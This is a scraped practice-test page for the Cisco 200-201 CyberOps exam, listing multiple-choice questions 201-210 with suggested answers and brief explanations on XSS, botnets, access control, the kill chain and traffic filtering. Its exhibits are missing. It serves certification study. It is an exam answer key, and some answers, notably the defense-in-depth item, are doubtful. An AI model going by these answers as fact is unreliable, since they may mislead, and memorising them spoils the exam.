ExamGecko
Search Search Login
Home Home / Cisco / 200-201

Cisco 200-201 Practice Test - Questions Answers, Page 21

Question list
Search
Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

An organization that develops high-end technology is going through an internal audit The organization uses two databases The main database stores patent information and a secondary database stores employee names and contact information A compliance team is asked to analyze the infrastructure and identify protected data Which two types of protected data should be identified? (Choose two)
Which security principle is violated by running all processes as root or administrator?
DRAG DROP Drag and drop the technology on the left onto the data type the technology provides on the right.
An intruder attempted malicious activity and exchanged emails with a user and received corporate information, including email distribution lists. The intruder asked the user to engage with a link in an email. When the fink launched, it infected machines and the intruder was able to access the corporate network. Which testing method did the intruder use?
A SOC analyst detected connections to known C&C and port scanning activity to main HR database servers from one of the HR endpoints via Cisco StealthWatch. What are the two next steps of the SOC team according to the NISTSP800-61 incident handling process? (Choose two)
Which statement describes indicators of attack?
What is a difference between SIEM and SOAR?
What describes the impact of false-positive alerts compared to false-negative alerts?
Refer to the exhibit. What is the potential threat identified in this Stealthwatch dashboard?
What is the difference between statistical detection and rule-based detection models?

Question 201

Report
Export
Collapse

Refer to the exhibit.

What is occurring?

A.

Cross-Site Scripting attack

A.

Cross-Site Scripting attack

Answers
B.

XML External Entitles attack

B.

XML External Entitles attack

Answers
C.

Insecure Deserialization

C.

Insecure Deserialization

Answers
D.

Regular GET requests

D.

Regular GET requests

Answers
Suggested answer: A

Explanation:

The exhibit shows a log of HTTP GET requests, one of which includes a suspicious string that is indicative of a Cross-Site Scripting (XSS) attack. XSS attacks involve injecting malicious scripts into webpages viewed by other users. These scripts can be used to steal information, redirect users to malicious websites, or perform actions on behalf of the user without their consent.Reference: Cisco Cybersecurity Operations Fundamentals, Module 1: Security Concepts, Lesson 1.3: Common Network Application Operations and Attacks, Topic 1.3.2: Web Application Attacks

Question 202

Report
Export
Collapse

What is a collection of compromised machines that attackers use to carry out a DDoS attack?

A.

subnet

A.

subnet

Answers
B.

botnet

B.

botnet

Answers
C.

VLAN

C.

VLAN

Answers
D.

command and control

D.

command and control

Answers
Suggested answer: B

Explanation:

A botnet is a network of compromised computers controlled by an attacker. Botnets are often used to carry out Distributed Denial of Service (DDoS) attacks, where the compromised machines are directed to flood a target with traffic, rendering it inaccessible.Reference:Cisco Cybersecurity Operations Fundamentals, Module 1: Security Concepts, Lesson 1.3: Common Network Application Operations and Attacks, Topic 1.3.4: Denial-of-Service Attacks

Question 203

Report
Export
Collapse

Which type of access control depends on the job function of the user?

A.

discretionary access control

A.

discretionary access control

Answers
B.

nondiscretionary access control

B.

nondiscretionary access control

Answers
C.

role-based access control

C.

role-based access control

Answers
D.

rule-based access control

D.

rule-based access control

Answers
Suggested answer: C

Explanation:

Role-Based Access Control (RBAC) is an approach to restricting system access to authorized users based on their roles within an organization. It depends on the job functions that individual users have as part of their responsibilities and is designed to reduce administrative work by assigning roles based on job competency, authority, and responsibility.Reference:Cisco Cybersecurity Operations Fundamentals, Module 1: Security Concepts, Lesson 1.2: Data Protection, Topic 1.2.2: Access Control Models

Question 204

Report
Export
Collapse

The security team has detected an ongoing spam campaign targeting the organization. The team's approach is to push back the cyber kill chain and mitigate ongoing incidents. At which phase of the cyber kill chain should the security team mitigate this type of attack?

A.

actions

A.

actions

Answers
B.

delivery

B.

delivery

Answers
C.

reconnaissance

C.

reconnaissance

Answers
D.

installation

D.

installation

Answers
Suggested answer: B

Explanation:

In the context of the cyber kill chain model, spam campaigns fall under the ''delivery'' phase where attackers deliver malicious payloads via email or other means to target systems or networks.Reference:Cisco Cybersecurity Operations Fundamentals, Module 1: Security Concepts, Lesson 1.4: Security Monitoring, Topic 1.4.2: The Cyber Kill Chain Model

Question 205

Report
Export
Collapse

What describes the defense-m-depth principle?

A.

defining precise guidelines for new workstation installations

A.

defining precise guidelines for new workstation installations

Answers
B.

categorizing critical assets within the organization

B.

categorizing critical assets within the organization

Answers
C.

isolating guest Wi-Fi from the focal network

C.

isolating guest Wi-Fi from the focal network

Answers
D.

implementing alerts for unexpected asset malfunctions

D.

implementing alerts for unexpected asset malfunctions

Answers
Suggested answer: D

Explanation:

The defense-in-depth principle is a strategy of applying multiple layers of security controls to protect an asset from threats. It is based on the assumption that no single security measure is sufficient to prevent all attacks, and that each layer adds more protection and reduces the risk of compromise. One example of applying the defense-in-depth principle is implementing alerts for unexpected asset malfunctions, which can indicate a potential security breach or incident.Reference:Cisco Cybersecurity Operations Fundamentals, Module 1: Security Concepts, Lesson 1.1: The CIA Triad and Security Concepts, Topic 1.1.4: Defense-in-Depth Principle

Question 206

Report
Export
Collapse

Refer to the exhibit.

A workstation downloads a malicious docx file from the Internet and a copy is sent to FTDv. The FTDv sends the file hash to FMC and the tile event is recorded what would have occurred with stronger data visibility.

A.

The traffic would have been monitored at any segment in the network.

A.

The traffic would have been monitored at any segment in the network.

Answers
B.

Malicious traffic would have been blocked on multiple devices

B.

Malicious traffic would have been blocked on multiple devices

Answers
C.

An extra level of security would have been in place

C.

An extra level of security would have been in place

Answers
D.

Detailed information about the data in real time would have been provided

D.

Detailed information about the data in real time would have been provided

Answers
Suggested answer: D

Explanation:

With stronger data visibility, detailed information about the data in real-time is provided. This enhanced visibility allows for a more comprehensive analysis of network traffic, enabling security professionals to identify and mitigate threats more effectively.Reference:=Cisco Cybersecurity Operations Fundamentals

Question 207

Report
Export
Collapse

What is the impact of encryption?

A.

Confidentiality of the data is kept secure and permissions are validated

A.

Confidentiality of the data is kept secure and permissions are validated

Answers
B.

Data is accessible and available to permitted individuals

B.

Data is accessible and available to permitted individuals

Answers
C.

Data is unaltered and its integrity is preserved

C.

Data is unaltered and its integrity is preserved

Answers
D.

Data is secure and unreadable without decrypting it

D.

Data is secure and unreadable without decrypting it

Answers
Suggested answer: D

Explanation:

Encryption ensures that data is secure and unreadable to unauthorized individuals without the proper decryption key.It is a critical aspect of maintaining data confidentiality and security, especially in the transmission of sensitive information over potentially insecure networks1.

Question 208

Report
Export
Collapse

An engineer is analyzing a recent breach where confidential documents were altered and stolen by the receptionist. Further analysis shows that the threat actor connected an externa USB device to bypass security restrictions and steal data. The engineer could not find an external USB device Which piece of information must an engineer use for attribution in an investigation?

A.

list of security restrictions and privileges boundaries bypassed

A.

list of security restrictions and privileges boundaries bypassed

Answers
B.

external USB device

B.

external USB device

Answers
C.

receptionist and the actions performed

C.

receptionist and the actions performed

Answers
D.

stolen data and its criticality assessment

D.

stolen data and its criticality assessment

Answers
Suggested answer: C

Explanation:

In the context of a cybersecurity breach, attribution involves identifying the responsible party. Since the external USB device was not found, the focus shifts to the actions performed by the receptionist.Analyzing these actions can provide insights into how the breach occurred and may help in attributing the incident to the threat actor

Question 209

Report
Export
Collapse

Refer to the exhibit.

During the analysis of a suspicious scanning activity incident, an analyst discovered multiple local TCP connection events Which technology provided these logs?

A.

antivirus

A.

antivirus

Answers
B.

proxy

B.

proxy

Answers
C.

IDS/IPS

C.

IDS/IPS

Answers
D.

firewall

D.

firewall

Answers
Suggested answer: D

Explanation:

The logs indicating multiple local TCP connection events are typically provided by a firewall. Firewalls are responsible for monitoring and controlling incoming and outgoing network traffic based on predetermined security rules, and they generate logs that detail such events, which can be used for further analysis and incident response.Reference:= Cisco Cybersecurity Operations Fundamentals

Question 210

Report
Export
Collapse

Refer to the exhibit.

An analyst was given a PCAP file, which is associated with a recent intrusion event in the company FTP server Which display filters should the analyst use to filter the FTP traffic?

A.

dstport == FTP

A.

dstport == FTP

Answers
B.

tcp.port==21

B.

tcp.port==21

Answers
C.

tcpport = FTP

C.

tcpport = FTP

Answers
D.

dstport = 21

D.

dstport = 21

Answers
Suggested answer: B

Explanation:

The correct display filter for analyzing FTP traffic in a PCAP file is ''tcp.port==21''. This filter will show all TCP packets where the port number is 21, which is the standard port for FTP control messages.

Total 331 questions
Go to page: of 34
ExamGecko

Copyright @2023 ExamGecko | All right reserved

Mail us: [email protected]
About us
Contact us
Twitter X
Facebook
Medium
Convert VPLUS to PDF
Open VPLUS files Easily and Quickly
Privacy Policy
Disclaimer
Terms